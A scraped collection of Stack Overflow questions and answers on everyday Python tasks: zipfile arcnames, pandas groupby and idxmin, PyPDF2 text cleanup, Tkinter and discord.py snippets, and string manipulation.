outZipFile.write(filepath, arcname)\n\n outZipFile.close()\n\n\n\n\nif __name__ == '__main__':\n zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME)\n\nZIP file structure:\nCompressedDir.zip\n.\n└── /pixmaps\n ├── pixmap_00.raw\n ├── pixmap_01.raw\n ├── /jpeg\n │ ├── pixmap_00.jpg\n │ └── pixmap_01.jpg\n └── /png\n ├── pixmap_00.png\n └── pixmap_01.png\n\n", "The arcname parameter in the write method specifies what will be the name of the file inside the zipfile:\nimport os\nimport zipfile\n\n# 1. Create a zip file which we will write files to\nzip_file = \"/home/username/test.zip\"\nzipf = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED)\n\n# 2. 
Write files found in \"/home/username/files/\" to the test.zip\nfiles_to_zip = \"/home/username/files/\"\nfor file_to_zip in os.listdir(files_to_zip):\n\n file_to_zip_full_path = os.path.join(files_to_zip, file_to_zip)\n\n # arcname argument specifies what will be the name of the file inside the zipfile\n zipf.write(filename=file_to_zip_full_path, arcname=file_to_zip)\n\nzipf.close()\n\n", "Check out the documentation for Zipfile.write.\n\nZipFile.write(filename[, arcname[, compress_type]]) Write the file\n named filename to the archive, giving it the archive name arcname (by\n default, this will be the same as filename, but without a drive letter\n and with leading path separators removed)\n\nhttps://docs.python.org/2/library/zipfile.html#zipfile.ZipFile.write\nTry the following:\nimport zipfile\nimport os\nfilename = 'foo.txt'\n\n# Using os.path.join is better than using '/' it is OS agnostic\npath = os.path.join(os.path.sep, 'tmp', 'bar', 'baz', filename)\nzip_filename = os.path.splitext(filename)[0] + '.zip'\nzip_path = os.path.join(os.path.dirname(path), zip_filename)\n\n# If you need exception handling wrap this in a try/except block\nwith zipfile.ZipFile(zip_path, 'w') as zf:\n zf.write(path, zip_filename)\n\nThe bottom line is that if you do not supply an archive name then the filename is used as the archive name and it will contain the full path to the file.\n", "You can isolate just the file name of your sources files using:\nname_file_only= name_full_path.split(os.sep)[-1]\n\nFor example, if name_full_path is /root/files/results/myfile.txt, then name_file_only will be myfile.txt. To zip myfile.txt to the root of the archive zf, you can then use:\nzf.write(name_full_path, name_file_only)\n\n", "It is much simpler than expected, I configured the module using the parameter \"arcname\" as \"file_to_be_zipped.txt\", so the folders do not appear in my final zipped file:\nmmpk_zip_file = zipfile.ZipFile(\"c:\\\\Destination_folder_name\\newzippedfilename.zip\", mode='w', compression=zipfile.ZIP_DEFLATED)\nmmpk_zip_file.write(\"c:\\\\Source_folder_name\\file_to_be_zipped.txt\", \"file_to_be_zipped.txt\")\nmmpk_zip_file.close()\n\n", "We can use this\nimport os\n# single File\nos.system(f\"cd {destinationFolder} && zip fname.zip fname\") \n# directory\nos.system(f\"cd {destinationFolder} && zip -r folder.zip folder\") \n\nFor me, This is working.\n", "Specify the arcname input of the write method as following:\ntofile = \"/root/files/result/\"+file\nNewRoot = \"files/result/\"\nzf.write(tofile, arcname=tofile.split(NewRoot)[1])\n\nMore info:\n\nZipFile.write(filename, arcname=None, compress_type=None,\ncompresslevel=None)\nhttps://docs.python.org/3/library/zipfile.html\n\n", "I face the same problem and i solve it with writestr. 
You can use it like this:\nzipObject.writestr(<filename> , <file data, bytes or string>)\n", "If you want an elegant way to do it with pathlib you can use it this way:\nfrom pathlib import Path\nimport zipfile\n\ndef zip_dir(path_to_zip: Path):\n zip_file = Path(path_to_zip).with_suffix('.zip')\n z = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED)\n for f in list(path_to_zip.rglob('*.*')):\n z.write(f, arcname=f.relative_to(path_to_zip))\n\n", "To get rid of the absolute path, I came up with this:\ndef create_zip(root_path, file_name, ignored=[], storage_path=None):\n \"\"\"Create a ZIP\n \n This function creates a ZIP file of the provided root path.\n \n Args:\n root_path (str): Root path to start from when picking files and directories.\n file_name (str): File name to save the created ZIP file as.\n ignored (list): A list of files and/or directories that you want to ignore. This\n selection is applied in root directory only.\n storage_path: If provided, ZIP file will be placed in this location. If None, the\n ZIP will be created in root_path\n \"\"\"\n if storage_path is not None:\n zip_root = os.path.join(storage_path, file_name)\n else:\n zip_root = os.path.join(root_path, file_name)\n \n zipf = zipfile.ZipFile(zip_root, 'w', zipfile.ZIP_DEFLATED)\n def iter_subtree(path, layer=0):\n # iter the directory\n path = Path(path)\n for p in path.iterdir():\n if layer == 0 and p.name in ignored:\n continue\n zipf.write(p, str(p).replace(root_path, '').lstrip('/'))\n \n if p.is_dir():\n iter_subtree(p, layer=layer+1)\n\n iter_subtree(root_path)\n zipf.close()\n\nMaybe it isn't the most elegant solution, but this works. If we just use p.name when providing the file name to write() method, then it doesn't create the proper directory structure.\nMoreover, if it's needed to ignore the selected directories or files from the root path, this ignores those selections too.\n", "This is an example I used. I have one excel file, Treport where I am using python + pandas in my dowork function to create pivot tables, etc. for each of the companies in CompanyNames. I create a zip file of the csv and a non-zip file so I can check as well.\nThe writer specifies the path where I want my .xlsx to go and for my zip files, I specify that in the zip.write(). I just specify the name of the xlsx file that was recently created, and that is what gets zipped up, not the whole directory. Beforehand I was just specifying 'writer' and would zip up the whole directory. This allows me to zip up just the recently created excel file.\nTreport = 'TestReportData.csv'\nCompanyNames = ['Company1','Company2','Company3']\nfor CompName in CompanyNames:\n strcomp = str(CompName)\n #Writer Creates pathway to output report to. Each company gets unique file.\n writer = pd.ExcelWriter(f\"C:\\\\Users\\\\MyUser\\\\Documents\\\\{strcomp}addReview.xlsx\", engine='xlsxwriter')\n DoWorkFunction(CompName, Treport, writer)\n writer.save()\n with ZipFile(f\"C:\\\\Users\\\\MyUser\\\\Documents\\\\{strcomp}addR.zip\", 'w') as zip:\n zip.write(writer, f\"{strcomp}addReview.xlsx\")\n\n" ]
[ 79, 20, 14, 9, 6, 6, 4, 2, 1, 0, 0, 0, 0 ]
[]
[]
[ "python", "zip" ]
stackoverflow_0027991745_python_zip.txt
Q: Don't use empty/none variables in method/class I have a class that looks something like:
@dataclass
class MyClass:
    df1: pd.Series = None
    df2: pd.Series = None
    df3: pd.Series = None
    df4: pd.Series = None
    df5: pd.Series = None

    @property
    def series_mean(self) -> pd.Series:
        series_mean = (
            self.df1
            + self.df2
            + self.df3
            + self.df4
            + self.df5
        ).mean()
        return series_mean

Generally this could just be done as a function alone, but for this case, let's just assume I do this. Now, my issue is that none of the dfs are mandatory, so I could give it just df1 and df5. In that case, the mean doesn't work because of the Nones in the class. So how do I go about using just the ones that are not None? And on top of that, is there a way to get how many of them are not None? I mean, if I wanted to do / 2 instead of .mean() when there are two that are not None.
A: Put them in a tuple instead and filter out the None values. Then you can easily both sum and query len from the filtered tuple. (Note that bool() of a Series is ambiguous, so the filtering below tests is not None rather than truthiness.)
from typing import Tuple

@dataclass
class MyClass:
    dfs: Tuple[pd.Series, pd.Series, pd.Series, pd.Series, pd.Series] = (None, None, None, None, None)

    @property
    def series_mean(self) -> pd.Series:
        not_none = tuple(df for df in self.dfs if df is not None)
        return sum(not_none) / len(not_none)

A: Assuming you actually need to keep this as five separate variables, which I doubt, you can use sum with a generator expression to filter out the None values
@property
def series_mean(self) -> pd.Series:
    return sum(
        df for df in
        [self.df1, self.df2, self.df3, self.df4, self.df5]
        if df is not None).mean()
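A quick usage sketch of the tuple-based version from the first answer (the numbers are made up):
import pandas as pd

mc = MyClass(dfs=(pd.Series([1.0, 2.0]), None, None, None, pd.Series([3.0, 4.0])))
print(mc.series_mean)                        # element-wise mean of the two series
print(sum(df is not None for df in mc.dfs))  # 2 -> how many are set

Note one subtlety: the question's original property sums the series and then calls .mean(), which yields a scalar, while sum(...) / len(...) returns an element-wise average series; pick whichever semantics is actually wanted.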
Don't use empty/none variables in method/class
I have a class that looks something like: @dataclass class MyClass: df1: pd.Series = None df2: pd.Series = None df3: pd.Series = None df4: pd.Series = None df5: pd.Series = None @property def series_mean(self) -> pd.Series: series_mean = ( self.df1 + self.df2 + self.df3 + self.df4 + self.df5 ).mean() return series_mean Generally this could just be done as a function alone, but for this case, let's just assume I do this. Now, my issue now is, that none of the df's are mandatory, so I could just give it df1 and df5. In that case, the mean doesn't work due to the None in the class. So how do I go about just using the ones that are not None ? And on top of that, is there a way to get how many of them are not None? I mean, if I wanted to do / 2 instead of .mean() if there is two that are not None.
[ "Put them in a tuple instead and filter on None. Then you can easily both sum and and query len from the filtered tuple.\nfrom typing import Tuple\n\n@dataclass\nclass MyClass:\n dfs: Tuple[pd.Series, pd.Series, pd.Series, pd.Series, pd.Series] = (None, None, None, None, None)\n\n @property\n def series_mean(self) -> pd.Series: \n not_none = tuple(filter(None, self.dfs))\n return sum(not_none) / len(not_none)\n\n", "Assuming you actually need to keep this as five separate variables, which I doubt, you can use sum with a generator expression to filter out the none values\n@property\ndef series_mean(self) -> pd.Series:\n return sum(\n df for df in \n [self.df1, self.df2, self.df3, self.df4, self.df5]\n if df is not None).mean\n\n" ]
[ 0, 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592371_python.txt
Q: bytes representation to string object when reading with PyPDF2 I read some PDF files and, unfortunately, I am using only PyPDF2.
with open(filename1, 'rb') as pdfFileObj:
    # creating a pdf reader object
    pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
    print(pdfReader.numPages)
    pageObj = pdfReader.getPage(0)
    gg = pageObj.extractText()
    print(gg)  # <- first print shows text
    type(gg)  # <- str
    gg  # <- second print shows bytes as string, e.g. '\x00K\x00o\x00n\x00t\x00o\x00a\x00u\x00s\x00z\x00ü\x00g\x00e\n\x00S\x00L\x00'

My issue is that gg is not bytes but a string representation of the bytes, so I cannot decode it into text. How can I access the printed str or convert the bytes representation to text so I can work with some regex?
A: A solution would be to replace all \x00 with "" by using re.sub('\x00', '', gg), so I have only the text. If there is another more efficient way, I would like to have a look.
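The interleaved \x00 bytes typically mean the page's text was stored as UTF-16 and extracted byte by byte, so stripping the NULs is enough here; a plain str.replace avoids the regex machinery. (A side note that may or may not apply: recent PyPDF2/pypdf releases expose extract_text(), which often avoids this artifact altogether and is worth trying.)
def clean_extracted(text: str) -> str:
    # '\x00K\x00o\x00n...' -> 'Kon...'
    return text.replace('\x00', '')

gg_clean = clean_extracted(gg)
print(gg_clean)  # regular text, ready for regex work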
bytes representation to string object when reading with PyPDF2
I read some PDF files and unfortunately, I am using only PyPDF2. with open(filename1, 'rb') as pdfFileObj: # creating a pdf reader object pdfReader = PyPDF2.PdfFileReader(pdfFileObj) print(pdfReader.numPages) pageObj = pdfReader.getPage(0) gg = pageObj.extractText() print(gg) #<- first print shows text type(gg) # <- str gg #<- second print shows bytes as string eg. '\x00K\x00o\x00n\x00t\x00o\x00a\x00u\x00s\x00z\x00ü\x00g\x00e\n\x00S\x00L\x00' My issue is that gg is not bytes but a string representation of the bytes so I cannot decode into text. How can I access the printed str or convert the bytes representation to text so I can work with some regex?
[ "A solution would be to replace all \\x00 with \"\" by using re.sub('\\x00','',gg) so I have only the text. If there is another more efficient way, I would like to have a look.\n" ]
[ 0 ]
[]
[]
[ "pypdf2", "python" ]
stackoverflow_0074592019_pypdf2_python.txt
Q: Adding Multiple Columns in Single groupby in Pandas Dataset image
Please help. I have a dataset with columns Country and Gas, plus year columns from 2019 back to 1991 (see the attached snapshot of the dataset). I want to add up all the values of a country, column-wise. For example, for Afghanistan, the value under 2019 should come to 56.4 (adding 28.79 + 6.23 + 16.37 + 5.01 = 56.4). It should calculate this result for every year. I have used the code below for the 2019 data:
df.groupby(by='Country')['2019'].sum()

This is the output of that code:
Country
---------------------
Afghanistan 56.40
Albania 17.31
Algeria 558.67
Andorra 1.18
Angola 256.10
...
Venezuela 588.72
Vietnam 868.40
Yemen 50.05
Zambia 182.08
Zimbabwe 235.06

I have grouped the data country-wise and added up the 2019 column values, but how should I add the values of the other years in a single line of code? Please help. I can write the code shown here to show multiple columns like this, but it would be a tedious task to write out each column name:
df.groupby(by='Country')[['2019','2018','2017']].sum()

A: If you don't specify the column, it will sum all the numeric columns.
df.groupby(by='Country').sum() 

             2019   2020  ...
Country
Afghanistan  56.40  32.4  ...
Albania      17.31  12.5  ...
Algeria      558.67 241.5 ...
Andorra      1.18   1.5   ...
Angola       256.10 32.1  ...
             ...    ...   ...
Venezuela    588.72 247.3 ...
Vietnam      868.40 323.5 ...
Yemen        50.05  55.7  ...
Zambia       182.08 23.4  ...
Zimbabwe     235.06 199.4 ...

Do a reset_index() to turn the Country index back into a regular column:
df.groupby(by='Country').sum().reset_index()

Country      2020   2019  ...
Afghanistan  56.40  32.4  ...
Albania      17.31  12.5  ...
Algeria      558.67 241.5 ...
Andorra      1.18   1.5   ...
Angola       256.10 32.1  ...
             ...    ...   ...
Venezuela    588.72 247.3 ...
Vietnam      868.40 323.5 ...
Yemen        50.05  55.7  ...
Zambia       182.08 23.4  ...
Zimbabwe     235.06 199.4 ...

A: You can select column keys in your dataframe starting from the 2019 column till the last column key in this way:
df.groupby(by='Country')[df.keys()[2:]].sum() 

The df.keys() method returns all the dataframe's column keys in a list; you can then slice it from the index of the '2019' key (which is 2) to the end of the column keys.
Suppose you want to select the columns from 2016 till 1992:
df.groupby(by='Country')[df.keys()[5:-1]].sum() 

You just need to slice the list of column keys in the correct index order.
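If the year columns should be picked up without hard-coding positions, a regex filter is another option. A sketch that assumes the year headers are four-digit strings such as '1991' ... '2019':
year_cols = df.filter(regex=r'^\d{4}$').columns
totals = df.groupby('Country')[list(year_cols)].sum().reset_index()

This keeps Country and Gas out of the selection automatically, even if more non-year columns are added later.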
Adding Multiple Columns in Single groupby in Pandas
Dataset image Please help, I have a dataset in which I have columns Country, Gas and Year from 2019 to 1991. Also attaching the snapshot of the dataset. I want to answer a question that I want to add all the values of a country column wise? For example, for Afghanistan, value should come 56.4 under 2019 (adding 28.79 + 6.23 + 16.37 + 5.01 = 56.4). Now I want it should calculate the result for every year. I have used below code for achieving 2019 data. df.groupby(by='Country')['2019'].sum() This is the output of that code: Country --------------------- Afghanistan 56.40 Albania 17.31 Algeria 558.67 Andorra 1.18 Angola 256.10 ... Venezuela 588.72 Vietnam 868.40 Yemen 50.05 Zambia 182.08 Zimbabwe 235.06 I have group the data country wise and adding the 2019 column values, but how should I add values of other years in single line of code? Please help. I can do the code shown here, to add rows and show multiple columns like this but this will be tedious task to do so write each column name. df.groupby(by='Country')[['2019','2018','2017']].sum()
[ "If you don't specify the column, it will sum all the numeric column.\ndf.groupby(by='Country').sum() \n\n 2019 2020 ...\nCountry\nAfghanistan 56.40 32.4 ...\nAlbania 17.31 12.5 ...\nAlgeria 558.67 241.5 ...\nAndorra 1.18 1.5 ...\nAngola 256.10 32.1 ...\n ... ... ...\nVenezuela 588.72 247.3 ...\nVietnam 868.40 323.5 ...\nYemen 50.05 55.7 ...\nZambia 182.08 23.4 ...\nZimbabwe 235.06 199.4 ...\n\nDo a reset_index() to flatten the columns\ndf.groupby(by='Country').sum().reset_index()\n\nCountry 2020 2019 ...\nAfghanistan 56.40 32.4 ...\nAlbania 17.31 12.5 ...\nAlgeria 558.67 241.5 ...\nAndorra 1.18 1.5 ...\nAngola 256.10 32.1 ...\n ... ... ...\nVenezuela 588.72 247.3 ...\nVietnam 868.40 323.5 ...\nYemen 50.05 55.7 ...\nZambia 182.08 23.4 ...\nZimbabwe 235.06 199.4 ...\n\n", "You can select columns keys in your dataframe starting from column 2019 till the last column key in this way:\ndf.groupby(by='Country')[df.keys()[2:]].sum() \n\nMethod df.keys will return all dataframe columns keys in a list then you can slice it from the index of 2019 key which is 2 till end of columns keys.\nSuppose you want to select columns from 2016 till 1992 column:\ndf.groupby(by='Country')[df.keys()[5:-1]].sum() \n\nyou just need to slice the list of columns keys in correct index order.\n" ]
[ 0, 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074589124_dataframe_pandas_python.txt
Q: How do I split a file into lines by spaces using the Tkinter library in Python?
I need to split the text held in a Tkinter Text widget into lines, and I tried this: Text = Text.split(sep='\n'), but I get the error "type object 'Text' has no attribute 'split'". Please tell me how to solve this. I tried to convert Text to a string, but with no result.

A: You need to get the data out of the text widget with the get method, and then call split on what is returned.

data = the_text_widget.get("1.0", "end-1c")
Text = data.split(sep="\n")
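A self-contained sketch of the answer's approach; the widget and sample text are invented for illustration (it needs a desktop session, since Tk opens a window):

import tkinter as tk

root = tk.Tk()
text_widget = tk.Text(root)
text_widget.insert("1.0", "first line\nsecond line")

# "1.0" = line 1, character 0; "end-1c" drops the trailing newline Tk appends
data = text_widget.get("1.0", "end-1c")
lines = data.split("\n")
print(lines)  # ['first line', 'second line']

root.destroy()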
How do I split a file into lines by spaces using the Tkinter library in Python?
I need to split a file into lines by spaces, using Tkinter's Text widget and I tried this: Text = Text.split(sep='\n'), but I get the error "type object 'Text' has no attribute 'split'" please, tell me how to solve this I tried to convert Text to string but no result
[ "You need to get the data out of the text widget with the get method, and then call split on what is returned.\ndata = the_text_widget.get(\"1.0\", \"end-1c\")\nText = data.split(sep=\"\\n\")\n\n" ]
[ 0 ]
[]
[]
[ "python", "tkinter" ]
stackoverflow_0074591782_python_tkinter.txt
Q: How to check whether string a is a substring of but not equal to string b?
I know that if we would like to know whether string a is contained in b, we can use:

a in b

When a equals b, the above expression still returns True. I would like an expression that returns False when a == b and returns True when a is a proper substring of b. So I used the following expression:

a in b and a != b

I just wonder: is there a simpler expression in Python that works the same way?

A: Not sure how efficient direct string comparisons are in Python, but assuming they are O(n), this should be reasonably efficient and still readable:

len(a) < len(b) and a in b

Like the other answers it's also O(n), but the length operation should be O(1). It should also be better suited for edge cases (e.g. a being bigger than b).

A: This is going to be a short answer, but it is what it is. What you have is enough. While there might be other alternatives, the way you did it is easy to understand, simple, and more readable than anything else (of course this is subjective). IMO a simpler expression in Python that works the same way doesn't exist. That's just my personal perspective on this subject. I'm usually encouraged to follow KISS:

The KISS principle states that most systems work best if they are kept simple rather than made complicated; therefore simplicity should be a key goal in design and unnecessary complexity should be avoided.

As an example, the other answer is not any different from the explicit and, and chaining can be confusing when used with in and == because many people will read that as (a1 in b) != a1, at least at first glance.

A: b.find(a) > 0 or b.startswith(a) and len(b) > len(a)

I'm not saying this is the best answer. It's just another solution. The OP's statement is as good as any. The accepted answer is also good. But this one does work and demonstrates a different approach to the problem.
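A quick sanity check of the proper-substring expression, wrapped as a small helper (the test values are chosen arbitrarily):

def proper_substring(a, b):
    # the O(1) length check short-circuits before the O(n) containment scan
    return len(a) < len(b) and a in b

assert proper_substring("ab", "abc")
assert not proper_substring("abc", "abc")    # equal strings -> False
assert not proper_substring("abcd", "abc")   # a longer than b -> False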
How to check whether string a is a substring of but not equal to string b?
I know that if we would like to know whether string a is contained in b we can use: a in b When a equals to b, the above express still returns True. I would like an expression that would return False when a == b and return True when a is a substring of b. So I used the following expression: a in b and a != b I just wonder is there a simpler expression in Python that works in the same way?
[ "Not sure how efficient direct string comparisons are in Python, but assuming they are O(n) this should be reasonably efficient and still readable :\nlen(a) < len(b) and a in b\n\nLikes the other answers it's also O(n), but the length operation should be O(1). It should also be better suited for edge cases (e.g. a being bigger than b)\n", "This is going to be a short answer, but it is what it is. What you have is enough. \nWhile there might be other alternatives, the way you did it is easy enough to understand, simple and more readable than anything else (of course this is subjective to each and everyone). IMO a simpler expression in Python that works in the same way doesn't exist. That's just my personal perspective on this subject. I'm usually encouraged to follow KISS:\n\nThe KISS principle states that most systems work best if they are kept\n simple rather than made complicated; therefore simplicity should be a\n key goal in design and unnecessary complexity should be avoided.\n\nAs an example, the other answer it's not any different from the explicit and, and the chaining can be confusing when used with in and == because many people will see that as (a1 in b) != a1, at least at first glance.\n", "b.find(a) > 0 or b.startswith(a) and len(b) > len(a)\nI'm not saying this is the best answer. It's just another solution. The OP's statement is as good as any. The accepted answer is also good. But this one does work and demonstrates a different approach to the problem.\n" ]
[ 4, 1, 0 ]
[]
[]
[ "python" ]
stackoverflow_0044393537_python.txt
Q: How can I make a discord bot take a message and turn it into a variable?
Please be forgiving with my code; this is my first ever project with Python. I'd like the bot to take a user message like "/channel http://youtube.com@youtube" and turn it into a variable like "channelID" that can be used later in the script. I'm working with this so far.

import discord
import re
import easygui
from easygui import *
from re import search
from urllib.request import urlopen
from bs4 import BeautifulSoup
import requests
import re
import json
import base64
import os
import webbrowser
import pyperclip
import win32com.client as comclt
import time
import pyautogui
import discord

intents = discord.Intents.all()
client = discord.Client(command_prefix='!', intents=intents)

@client.event
async def on_ready():
    print('We have logged in as {0.user}'.format(client))

client.run('token')

@client.event
async def on_message(message):
    if message.author == client.user:
        return
    if message.content.startswith('/channel '):
        channelURL = message.content()
        if search("http", channelURL):
            if re.search("://", channelURL):
                if re.search("youtu", channelURL):
                    # Loads page data #
                    soup = BeautifulSoup(requests.get(channelURL, cookies={'CONSENT': 'YES+1'}).text, "html.parser")
                    data = re.search(r"var ytInitialData = ({.*});", str(soup.prettify())).group(1)
                    json_data = json.loads(data)
                    # Finds channel information #
                    channel_id = json_data["header"]["c4TabbedHeaderRenderer"]["channelId"]
                    channel_name = json_data["header"]["c4TabbedHeaderRenderer"]["title"]
                    channel_logo = json_data["header"]["c4TabbedHeaderRenderer"]["avatar"]["thumbnails"][2]["url"]
                    channel_id_link = "https://youtube.com/channel/"+channel_id
                    # Prints channel information to console #
                    print("Channel ID: "+channel_id)
                    print("Channel Name: "+channel_name)
                    print("Channel Logo: "+channel_logo)
                    print("Channel ID: "+channel_id_link)
                    # Creates HTML file var #
                    f = open('channelid.html','w')
                    # Converts and downloads image file to png #
                    imgUrl = channel_logo
                    filename = "image.png".split('/')[-1]
                    r = requests.get(imgUrl, allow_redirects=True)
                    open(filename, 'wb').write(r.content)
                    await message.channel.send(channel_id_link)

I tried to use if message.content.startswith('/channel '): and channelURL = message.content(). I know I'm missing something really simple; I just can't put my finger on it. I wanted channelURL = message.content() to store the value whenever if message.content.startswith('/channel '): matched.

A: discord.Message.content is a str and can't be called like a function, i.e., message.content(). Use channelURL = message.content instead. Remember to enable message content intents.
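A trimmed sketch of just the fix, assuming discord.py 2.x — message.content is an attribute, not a method; the token string is a placeholder and the YouTube scraping is omitted:

import discord

intents = discord.Intents.default()
intents.message_content = True  # required for the bot to read message text
client = discord.Client(intents=intents)

@client.event
async def on_message(message):
    if message.author == client.user:
        return
    if message.content.startswith('/channel '):
        channel_url = message.content[len('/channel '):]  # attribute access, no ()
        await message.channel.send(f'Got URL: {channel_url}')

client.run('YOUR_TOKEN')  # placeholder token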
How can I make a discord bot take a message and turn it into a variable?
Please be forgivable with my code, this is my first ever project with py. I'd like it to turn a message user like "/channel http://youtube.com@youtube" to a variable like "channelID" that can be used later in the py. I'm working with this so far. import discord import re import easygui from easygui import * from re import search from urllib.request import urlopen from bs4 import BeautifulSoup import requests import re import json import base64 import os import webbrowser import pyperclip import win32com.client as comclt import time import pyautogui import discord intents = discord.Intents.all() client = discord.Client(command_prefix='!', intents=intents) @client.event async def on_ready(): print('We have logged in as {0.user}'.format(client)) client.run('token') @client.event async def on_message(message): if message.author == client.user: return if message.content.startswith('/channel '): channelURL = message.content() if search("http", channelURL): if re.search("://", channelURL): if re.search("youtu", channelURL): # Loads page data # soup = BeautifulSoup(requests.get(channelURL, cookies={'CONSENT': 'YES+1'}).text, "html.parser") data = re.search(r"var ytInitialData = ({.*});", str(soup.prettify())).group(1) json_data = json.loads(data) # Finds channel information # channel_id = json_data["header"]["c4TabbedHeaderRenderer"]["channelId"] channel_name = json_data["header"]["c4TabbedHeaderRenderer"]["title"] channel_logo = json_data["header"]["c4TabbedHeaderRenderer"]["avatar"]["thumbnails"][2]["url"] channel_id_link = "https://youtube.com/channel/"+channel_id # Prints Channel information to console # print("Channel ID: "+channel_id) print("Channel Name: "+channel_name) print("Channel Logo: "+channel_logo) print("Channel ID: "+channel_id_link) # Creates HTML file var# f = open('channelid.html','w') # Converts and downlaods image file to png # imgUrl = channel_logo filename = "image.png".split('/')[-1] r = requests.get(imgUrl, allow_redirects=True) open(filename, 'wb').write(r.content) await message.channel.send(channel_id_link) I tried to use if message.content.startswith('/channel '): and channelURL = message.content() But I know I'm missing something really simple. I just can't put my finger on it. I was channelURL = message.content() to store the variable of if message.content.startswith('/channel '):
[ "discord.Message.content is a str and can't be called like a function i.e., message.content().\nUse channelURL = message.content instead.\nRemember to enable message content intents.\n" ]
[ 2 ]
[]
[]
[ "bots", "discord.py", "python" ]
stackoverflow_0074592407_bots_discord.py_python.txt
Q: Duplicates issue while looking for the smallest value with .idxmin()
Sample data:

Fitness Value    MSU Locations    MSU Range
1.045426         {13, 38, 15}     2.213424
1.096542         {9, 38, 39}      2.226205
1.226040         {1, 22, 30}      1.871269
1.045426         {13, 38, 15}     2.213424
1.096542         {9, 38, 39}      2.226205
1.143814         {26, 19, 20}     2.223852
1.045426         {13, 38, 15}     2.213424
1.096542         {9, 38, 39}      2.226205
1.143814         {26, 19, 20}     2.223852

I am trying to find the minimum value in the Fitness Value column while keeping the whole row record. Sample code:

WATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].idxmin()]
WATT

Output:

Fitness Value    MSU Locations    MSU Range
1.045426         {13, 38, 15}     2.213424
1.158718         {29, 22, 39}     2.143414
1.045426         {13, 38, 15}     2.213424
1.139776         {18, 3, 23}      1.599072
1.045426         {13, 38, 15}     2.213424
1.136302         {17, 10, 13}     2.217177

I want to print only the smallest value, but it prints multiple values (including duplicates). Any solution?

A: Try the following code; it handles duplicates.

WATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].eq(df_min_value_in_each_generation['Fitness Value'].min())]
WATT
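A compact runnable version of the answer's filter on toy data (the set-valued column is omitted for brevity); drop_duplicates can then collapse identical minimum rows if only one is wanted:

import pandas as pd

df = pd.DataFrame({
    'Fitness Value': [1.045426, 1.096542, 1.045426],
    'MSU Range': [2.213424, 2.226205, 2.213424],
})

# every row whose fitness equals the minimum, duplicates included
min_rows = df.loc[df['Fitness Value'].eq(df['Fitness Value'].min())]

one_row = min_rows.drop_duplicates()  # keep a single representative row
print(one_row)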
Duplicates issue while looking for the smallest value with .idxmin()
Sample Data: Fitness Value MSU Locations MSU Range 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.226040 {1, 22, 30} 1.871269 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.143814 {26, 19, 20} 2.223852 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.143814 {26, 19, 20} 2.223852 I am trying to find a minimum value in Fitness Value column and keeping the whole row record. Sample Code: WATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].idxmin()] WATT Output: Fitness Value MSU Locations MSU Range 1.045426 {13, 38, 15} 2.213424 1.158718 {29, 22, 39} 2.143414 1.045426 {13, 38, 15} 2.213424 1.139776 {18, 3, 23} 1.599072 1.045426 {13, 38, 15} 2.213424 1.136302 {17, 10, 13} 2.217177 I want to print only the smallest value but its print multiple values (also duplicates). Any solution?
[ "Try to use the following code, it handles duplicates.\nWATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].eq(df['Fitness Value'].min())]\n\nWATT\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "genetic_algorithm", "genetic_programming", "pandas", "python" ]
stackoverflow_0074592409_dataframe_genetic_algorithm_genetic_programming_pandas_python.txt
Q: How can I change the whitespace between words of a string when printing?
I was writing some code to read a sentence from the user, then change its whitespace to "..." and print the sentence, e.g. for input like:

hi rocks

I intended to input a sentence and change its whitespace to "...". I wrote this code:

a = input("inter your sentence: ")
# split into n strings
# print every string with ... as whitespace
a = a.split()
for x in a:
    print(x, sep='...', end="")

If I input this is a test, I expected to see this...is...a...test, but it doesn't work: it gives me "thisisatest".

A: str.replace can be used to replace one or more occurrences of a character with another string. In your case, it would be:

a = input("inter your sentence: ")
a = a.replace(' ', '...')
print(a)

A: Do this:

a = input("inter your sentence: ")
# split into n strings
# print every string with ... as whitespace
a = a.split()
print(*a, sep='...')

Or do this:

a = input("inter your sentence: ")
# split into n strings
# print every string with ... as whitespace
a = a.split()
final_a = '...'.join(a)
print(final_a)

OUTPUT (for input this is a test):

this...is...a...test

Replying to the OP's comment, "so what you think about this one for x in range(0,10): print (x ,sep='...', end="") it didn't work too":

for x in range(0,10):
    print(x, sep='...', end="")

Note: sep separates the args provided to the print method; the default is sep=" ".
Example:

print("one", "1", sep="-->")
# Output: one-->1

And end: after every print call's args are printed, print also emits the end value. The default is end="\n" (\n → newline).
Example:

for a in range(0, 10):
    print(a, end=".|.")

# Output: 0.|.1.|.2.|.3.|.4.|.5.|.6.|.7.|.8.|.9.|.

# Here, when 0 prints, the print method also prints `end`'s value after it, then 1, then `end`'s value, and so on.

The answer to your comment's question can be this:

for x in range(0,10):
    print(x, end='...')

Output: as I said, end's value prints after every print call's args, so '...' is also printed after the last value of x (9):

0...1...2...3...4...5...6...7...8...9...

A: You can make use of the Python join and split functions in this case.

The code snippet:

inputSentence = input("Enter your sentence: ")

print("...".join(inputSentence.split()))

The output:

Enter your sentence: This is a test

This...is...a...test
How can I change the whitespace between words of a string when printing?
i was writing a code to input a sentence of user then change its whitespaces to ... and print the sentence. hi rocks I intended to input a sentence and change its whitespaces to "..." I wrote this code: a=input("inter your sentence: ") #split in to n str #print every str with ... as whitespace a=a.split() for x in a: print(x, sep='...',end="") if I input this is a test, i expected to see this...is...a...test but it doesn't work it gives me "thisisatest
